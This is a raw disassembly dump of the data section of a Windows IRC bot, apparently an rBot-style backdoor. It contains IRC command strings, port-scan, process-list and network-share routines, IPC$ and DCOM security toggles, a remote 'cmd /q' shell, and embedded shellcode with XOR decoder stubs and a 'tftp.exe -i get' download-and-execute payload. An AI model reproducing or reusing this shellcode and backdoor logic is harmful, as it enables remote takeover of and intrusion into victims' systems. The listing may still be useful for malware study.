dword_432DA8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5AB�o
dd 2BBBB02h
aJoinedChanne_0 db ' Joined channel: %s.',0
align 4
a353 db '353',0 ; DATA XREF: sub_40EE72+574�o
aPart db 'PART',0 ; DATA XREF: sub_40EE72+526�o
; sub_40EE72+5EF�o
align 4
aSS_1 db ':%s%s',0 ; DATA XREF: sub_40EE72+4FE�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_40EE72+3D0�o
align 4
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+371�o
; sub_40EE72+613�o
dword_432E04 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+355�o
; sub_40EE72+5FF4�o ...
dd 2BBBB02h
aUserSLoggedO_0 db ' User %s logged out.',0
align 4
aKick db 'KICK',0 ; DATA XREF: sub_40EE72+2E4�o
align 4
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+28D�o
; sub_40EE72+4EB7�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_40EE72+262�o
a@: ; DATA XREF: sub_40EE72+23A�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_40EE72+22A�o
a005 db '005',0 ; DATA XREF: sub_40EE72+215�o
a001 db '001',0 ; DATA XREF: sub_40EE72+200�o
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+1E4�o
; sub_40EE72+3B7�o ...
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+1C3�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_40EE72+1A9�o
align 10h
asc_432E80: ; DATA XREF: sub_40EE72+19A�o
; sub_40EE72+60FB�o
unicode 0, <!>,0
asc_432E84 db ' :',0 ; DATA XREF: sub_40EE72+86�o
; sub_40EE72:loc_40FA19�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_41518A+120�o
align 4
unk_432E94 db 2 ; DATA XREF: sub_41533B:loc_4153C2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aProcessListFai db 'Process list failed.',0
align 4
unk_432ECC db 2 ; DATA XREF: sub_41533B+80�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aProcessListCom db 'Process list completed.',0
unk_432F04 db 2 ; DATA XREF: sub_41533B+19�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aListingProcess db 'Listing processes:',0
align 4
dword_432F38 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_415480+1E9�o
dd 2029671Fh, 2BBBB02h
aUserLoggedOutS db ' User logged out: <%s@%s>.',0
dword_432F70 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_415480+1C2�o
dd 2029671Fh, 2BBBB02h
aErrorSessionru db ' Error: SessionRun(): <%d>.',0
align 4
dword_432FAC dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_415480+1A2�o
dd 2029671Fh, 2BBBB02h
aUserLoggedInS@ db ' User logged in: <%s@%s>.',0
align 4
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_415480+172�o
align 4
dword_432FF8 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_415480+E1�o
dd 2029671Fh, 2BBBB02h
aErrorGetpeerna db ' Error: getpeername(): <%d>.',0
align 4
dword_433034 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_415685:loc_4156CA�o
dd 2029671Fh, 2BBBB02h
aProtocolString db ' Protocol string too long.',0
dword_43306C dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4156DF+1B�o
dd 2029671Fh, 2BBBB02h
aLoginRejectedR db ' Login rejected, Remote user: <%s@%s>.',0
dword_4330B0 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570E+219�o
dd 2029671Fh, 2BBBB02h
aErrorServerF_0 db ' Error: server failed, returned: <%d>.',0
dword_4330F4 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570E+1FB�o
dd 2029671Fh, 2BBBB02h
aFailedToSta_31 db ' Failed to start client thread, error: <%d>.',0
align 10h
dword_433140 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570E+177�o
dd 2029671Fh, 2BBBB02h
aClientConnec_2 db ' Client connection from IP: %s:%d, Server thread: %d.',0
align 4
dword_433194 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570E+106�o
dd 2029671Fh, 2BBBB02h
aReadyAndWaitin db ' Ready and waiting for incoming connections.',0
align 10h
dword_4331E0 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570E+70�o
dd 2029671Fh, 2BBBB02h
aFailedToInstal db ' Failed to install control-C handler, error: <%d>.',0
dword_433230 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570E+3D�o
dd 2029671Fh, 2BBBB02h, 72452020h, 3A726F72h, 41535720h
dd 72617453h, 28707574h, 3C203A29h, 2E3E6425h, 2 dup(0)
aConst db 'const',0
align 4
dd 0
dword_43327C dd 1 ; DATA XREF: sub_415D01+7�o
off_433280 dd offset sub_415996 ; DATA XREF: sub_415D01+49�r
aLetter db 'letter',0
align 10h
dd 2, 4159F4h, 706D6F63h, 2 dup(0)
dd 3, 415A41h, 6E756F63h, 797274h, 0
dd 4, 415ADFh, 736Fh, 2 dup(0)
dd 5, 415B54h
dword_4332D4 dd 69257325h, 0 ; DATA XREF: sub_415996+40�o
; _0:00415AC0�o ...
byte_4332DC db 50h ; DATA XREF: _0:00415A63�o _0:00415A70�r
db 43h, 2 dup(0)
dword_4332E0 dd 7C7325h ; DATA XREF: _0:00415B0E�o
; sub_415D01+39�o
dword_4332E4 dd 5D73255Bh, 7Ch ; DATA XREF: _0:00415C18�o
dword_4332EC dd 334B32h ; DATA XREF: _0:00415C08�o
dword_4332F0 dd 5D64255Bh, 7325h ; DATA XREF: sub_415C5E+3A�o
dword_4332F8 dd 5D4D5Bh ; DATA XREF: sub_415C5E+2C�o
; sub_415C5E+57�o
unk_4332FC db 2 ; DATA XREF: sub_415D6A+92�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSPortDIsOp_0 db ' IP: %s Port: %d is open.',0
unk_433334 db 2 ; DATA XREF: sub_415E37+41�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aScanningIpSPor db ' Scanning IP: %s, Port: %d.',0
align 10h
off_433370 dd offset dword_4333A8 ; DATA XREF: sub_415F88+1B3�o
; sub_4162AC+17A�o
align 8
dd offset dword_4333A0
align 10h
off_433380 dd offset dword_43339C ; DATA XREF: sub_4162AC+1E3�o
dd offset dword_433398
dd offset dword_433394
dd offset dword_433390
dword_433390 dd 5C3A44h ; DATA XREF: sub_415F88+217�o
; _2:0043338C�o
dword_433394 dd 2444h ; DATA XREF: _2:00433388�o
dword_433398 dd 5C3A43h ; DATA XREF: _2:00433384�o
dword_43339C dd 2443h ; DATA XREF: _2:off_433380�o
dword_4333A0 dd 494D4441h, 244Eh ; DATA XREF: _2:00433378�o
dword_4333A8 dd 24435049h, 0 ; DATA XREF: _2:off_433370�o
unk_4333B0 db 2 ; DATA XREF: sub_415F88+2E5�o
; sub_4162AC+2DB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aNetapi32_dllCo db ' Netapi32.dll couldn',27h,'t be loaded.',0
align 10h
unk_4333F0 db 2 ; DATA XREF: sub_415F88+2CF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aNetworkSharesD db ' Network shares deleted.',0
align 4
unk_433428 db 2 ; DATA XREF: sub_415F88:loc_4161EA�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToDelete db ' Failed to delete ',27h,'%S',27h,' share.',0
align 4
unk_433464 db 2 ; DATA XREF: sub_415F88+25B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aShareSDeleted_ db ' Share ',27h,'%S',27h,' deleted.',0
align 4
unk_433498 db 2 ; DATA XREF: sub_415F88:loc_416157�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToDele_0 db ' Failed to delete ',27h,'%s',27h,' share.',0
align 4
unk_4334D4 db 2 ; DATA XREF: sub_415F88+1C8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aShareSDelete_0 db ' Share ',27h,'%s',27h,' deleted.',0
align 4
unk_433508 db 2 ; DATA XREF: sub_415F88:loc_4160BA�o
; sub_4162AC:loc_4163DA�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aAdvapi32_dllCo db ' Advapi32.dll couldn',27h,'t be loaded.',0
align 4
unk_433548 db 2 ; DATA XREF: sub_415F88:loc_4160B3�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToOpenIp db ' Failed to open IPC$ Restriction registry key.',0
align 4
unk_433594 db 2 ; DATA XREF: sub_415F88:loc_416095�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aRestrictedAcce db ' Restricted access to the IPC$ Share.',0
align 4
unk_4335D8 db 2 ; DATA XREF: sub_415F88+106�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToRestri db ' Failed to restrict access to the IPC$ Share.',0
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_415F88+ED�o
; sub_4162AC+ED�o
align 4
unk_433638 db 2 ; DATA XREF: sub_415F88+91�o
; sub_4162AC+91�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToOpenDc db ' Failed to open DCOM registry key.',0
align 4
dword_433678 dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_415F88:loc_415FF5�o
dd 2202967h, 2002BBBBh, 4F434420h, 6964204Dh, 6C626173h
dd 2E6465h
unk_4336A4 db 2 ; DATA XREF: sub_415F88+66�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aDisableDcomFai db ' Disable DCOM failed.',0
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_415F88+54�o
; sub_4162AC+54�o
align 4
word_4336E4 dw 4Eh ; DATA XREF: sub_415F88+38�r
align 4
unk_4336E8 db 2 ; DATA XREF: sub_4162AC+2C3�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aNetworkSharesA db ' Network shares added.',0
align 4
aC_2 db '%c:\',0 ; DATA XREF: sub_4162AC+230�o
align 4
aC_3 db '%c$',0 ; DATA XREF: sub_4162AC+219�o
unk_433728 db 2 ; DATA XREF: sub_4162AC:loc_41644B�o
; sub_4162AC:loc_41651C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToAddSSh db ' Failed to add ',27h,'%s',27h,' share.',0
align 10h
unk_433760 db 2 ; DATA XREF: sub_4162AC+198�o
; sub_4162AC+269�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aShareSAdded_ db ' Share ',27h,'%s',27h,' added.',0
align 10h
unk_433790 db 2 ; DATA XREF: sub_4162AC:loc_4163D3�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToOpen_0 db ' Failed to open IPC$ restriction registry key.',0
align 4
unk_4337DC db 2 ; DATA XREF: sub_4162AC:loc_4163B5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aUnrestrictedAc db ' Unrestricted access to the IPC$ Share.',0
unk_433820 db 2 ; DATA XREF: sub_4162AC+102�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToUnrest db ' Failed to unrestrict access to the IPC$ Share.',0
dword_43386C dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_4162AC:loc_416319�o
dd 2202967h, 2002BBBBh, 4F434420h, 6E65204Dh, 656C6261h
dd 2E64h
unk_433898 db 2 ; DATA XREF: sub_4162AC+66�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aEnableDcomFail db ' Enable DCOM failed.',0
align 4
word_4338CC dw 59h ; DATA XREF: sub_4162AC+38�r
align 10h
dword_4338D0 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4165C6+DE�o
dd 2029671Fh, 2BBBB02h
aWaitformultipl db ' WaitForMultipleObjects error: <%d>.',0
align 4
dword_433914 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4165C6+59�o
; sub_4165C6+8B�o
dd 2029671Fh, 2BBBB02h
aFailedToCrea_0 db ' Failed to create ReadShell session thread, error: <%d>.',0
align 4
dword_43396C dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_416717+AF�o
dd 2029671Fh, 2BBBB02h
aFailedToExecut db ' Failed to execute shell.',0
align 4
dword_4339A4 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_416717+7E�o
dd 2029671Fh, 2BBBB02h
aFailedToCrea_1 db ' Failed to create shell stdin pipe, error: <%d>.',0
align 4
dword_4339F4 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_416717+5C�o
dd 2029671Fh, 2BBBB02h
aFailedToCrea_2 db ' Failed to create shell stdout pipe, error: <%d>.',0
align 4
dword_433A44 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_416810+C3�o
dd 2029671Fh, 2BBBB02h
aFailedToExec_0 db ' Failed to execute shell, error: <%d>.',0
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_416810+8C�o
align 10h
dword_433A90 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4168E9+A1�o
dd 2029671Fh, 2BBBB02h
aSessionreadshe db ' SessionReadShellThread exited, error: <%ld>.',0
align 4
loc_433ADC: ; DATA XREF: sub_416C55+C4�o
jmp short loc_433AE0
; ---------------------------------------------------------------------------
loc_433ADE: ; CODE XREF: _2:loc_433AE0�p
jmp short loc_433AE5
; ---------------------------------------------------------------------------
loc_433AE0: ; CODE XREF: _2:loc_433ADC�j
call loc_433ADE
loc_433AE5: ; CODE XREF: _2:loc_433ADE�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 66h, 0B9h
word_433AEA dw 0FFFFh ; DATA XREF: sub_416C55+CC�w
db 80h, 73h, 0Eh
byte_433AEF db 0FFh ; DATA XREF: sub_416C55+D3�w
dd 0F9E243h
; ---------------------------------------------------------------------------
loc_433AF4: ; DATA XREF: sub_416C55+A2�o
jmp short loc_433AF8
; ---------------------------------------------------------------------------
loc_433AF6: ; CODE XREF: _2:loc_433AF8�p
jmp short loc_433AFD
; ---------------------------------------------------------------------------
loc_433AF8: ; CODE XREF: _2:loc_433AF4�j
call loc_433AF6
loc_433AFD: ; CODE XREF: _2:loc_433AF6�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 0B1h
byte_433B01 db 0FFh ; DATA XREF: sub_416C55+AA�w
dw 7380h
db 0Ch
byte_433B05 db 0FFh ; DATA XREF: sub_416C55+B0�w
dw 0E243h
dd 0F9h
dword_433B0C dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_416ADE+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_433B70 dd 12h ; DATA XREF: sub_416ADE+3D�w
aTftp_exeIGet db 'tftp.exe -i get ',0 ; DATA XREF: sub_416ADE+79�o
aJ db 'j',0
db 0E8h
dword_433B89 dd 17h ; DATA XREF: sub_416ADE+4D�w
; ---------------------------------------------------------------------------
jnz short near ptr byte_433B90
retn
; ---------------------------------------------------------------------------
byte_433B90 db 0E8h ; CODE XREF: _2:00433B8D�j
dword_433B91 dd 1 ; DATA XREF: sub_416ADE+45�w
byte_433B95 db 0, 6Ah, 0 ; DATA XREF: sub_416ADE+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_433B9F dd 0FFFFFFEDh ; DATA XREF: sub_416ADE+5D�w
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi
add esp, 54h
test eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_416E19+10�o
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_416FEA+51�o
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_416FEA+35�o
dword_433C20 dd 0D002C3D6h ; DATA XREF: sub_417302+4�w sub_41730C�r ...
align 10h
dword_433C30 dd 173Fh ; DATA XREF: sub_417CA4+D�r
dd 9875h, 9873h
off_433C3C dd offset sub_417D73 ; DATA XREF: sub_419AB8�r
dd offset nullsub_3
dd offset nullsub_3
dword_433C48 dd 1B3Fh ; DATA XREF: sub_417DEB+D�r
dword_433C4C dd 19930520h, 4 dup(0) ; DATA XREF: sub_41826D+2�o
; sub_418276+2�o
off_433C60 dd offset sub_419AF6 ; DATA XREF: sub_419CDA+1C�r
dword_433C64 dd 2 ; DATA XREF: sub_41F84C+E�r
; sub_41F885+46�r ...
off_433C68 dd offset aNull_0 ; DATA XREF: sub_419E38:loc_41A19C�r
; sub_419E38+457�r
; "(null)"
off_433C6C dd offset aNull ; DATA XREF: sub_419E38+259�r
; "(null)"
off_433C70 dd offset word_433C7A ; DATA XREF: sub_417794+23�r
; sub_417794:loc_4177F5�r ...
off_433C74 dd offset word_433C7A ; DATA XREF: sub_422EB1+18�r
db 2 dup(0)
word_433C7A dw 20h ; DATA XREF: sub_42102E+18�r
; _2:off_433C70�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_433E7C dd 1 ; DATA XREF: sub_417794:loc_41779C�r
; sub_417794:loc_4177E0�r ...
byte_433E80 db 2Eh ; DATA XREF: sub_41C86F:loc_41C8AF�r
; sub_41C8C9+4�r ...
align 4
dd 1, 10h, 0
off_433E90 dd offset off_433E90 ; DATA XREF: sub_41B888+D�o
; sub_41B888+69�o ...
off_433E94 dd offset off_433E90 ; DATA XREF: sub_41B888:loc_41B908�r
; sub_41B888+89�w ...
dd offset dword_433EA8
dd offset dword_433EA8
dword_433EA0 dd 0FFFFFFFFh ; DATA XREF: sub_41B888�r
; sub_41B9CC:loc_41BA19�w
dd 0FFFFFFFFh
dword_433EA8 dd 0F0h, 0F1h, 4E6h dup(0) ; DATA XREF: _2:00433E98�o
; _2:00433E9C�o
db 0
byte_435249 db 3 dup(0) ; DATA XREF: _2:off_4274DC�o
dd 319h dup(0)
off_435EB0 dd offset off_433E90 ; DATA XREF: sub_41B9CC+15�r
; sub_41B9CC+20�w ...
dword_435EB4 dd 1E0h ; DATA XREF: sub_417BC7:loc_417C03�r
; sub_41944F+185�r ...
dword_435EB8 dd 14h ; DATA XREF: sub_41C5B8+2�o
off_435EBC dd offset aExp ; DATA XREF: sub_41C5B8:loc_41C5D5�r
; "exp"
dd 1Dh, 42480Ch, 1Ah, 424808h, 1Bh, 424800h, 1Fh, 4247F8h
dd 13h, 4247F0h, 21h, 4247E8h, 0Eh, 4247E0h, 0Dh, 4247D8h
dd 0Fh, 4247D0h, 10h, 4247C8h, 5, 4247C0h, 1Eh, 4247BCh
dd 12h, 4247B8h, 20h, 4247B4h, 0Ch, 4247ACh, 0Bh, 4247A4h
dd 15h, 42479Ch, 1Ch, 424794h, 19h, 42478Ch, 11h, 424784h
dd 18h, 42477Ch, 16h, 424774h, 17h, 42476Ch, 22h, 424768h
dd 23h, 424764h, 24h, 424760h
dbl_435F90 dq 1.797693134862316e308 ; DATA XREF: sub_41C2F3+B7�r
; sub_41C2F3:loc_41C3DA�r ...
dd 0
dd 0FFF80000h
dbl_435FA0 dq 1.797693134862316e308 ; DATA XREF: sub_41C2F3+92�r
; sub_41C2F3:loc_41C3B2�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_435FB8 dt 2.3562723457267347066e313 ; DATA XREF: sub_41C7A0+D�r
; sub_41C7A0+1F�r
align 4
tbyte_435FC4 dt 1.9149954921904370718e-1233 ; DATA XREF: sub_41C7A0+31�r
align 10h
off_435FD0 dd offset sub_41CC34 ; DATA XREF: sub_417D8B+F�w
; sub_419E38+3AA�r
off_435FD4 dd offset sub_41C8C9 ; DATA XREF: sub_417D8B+5�w
; sub_419E38+3E2�r
off_435FD8 dd offset sub_41C92F ; DATA XREF: sub_417D8B+14�w
; sub_41D797+430�r
off_435FDC dd offset sub_41C86F ; DATA XREF: sub_417D8B+1E�w
; sub_419E38+3CB�r
off_435FE0 dd offset sub_41C917 ; DATA XREF: sub_417D8B+28�w
off_435FE4 dd offset sub_41CC34 ; DATA XREF: sub_417D8B+32�w
dd offset sub_42086E
align 10h
dd offset sub_41D4FC
off_435FF4 dd offset sub_41D4FC ; DATA XREF: sub_41D552+29�r
dword_435FF8 dd 0D2D0920h, 5Dh ; DATA XREF: sub_41D797:loc_41DCFE�o
dword_436000 dd 5Dh, 0 ; DATA XREF: sub_41D797:loc_41DBEE�o
byte_436008 db 1 ; DATA XREF: sub_41E92D+E1�r
db 2, 4, 8
align 10h
dword_436010 dd 3A4h ; DATA XREF: sub_41E92D+2F�o
dword_436014 dd 82798260h, 21h, 0 ; DATA XREF: sub_41E92D+11D�r
dword_436020 dd 0DFA6h ; DATA XREF: sub_41E92D+C0�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
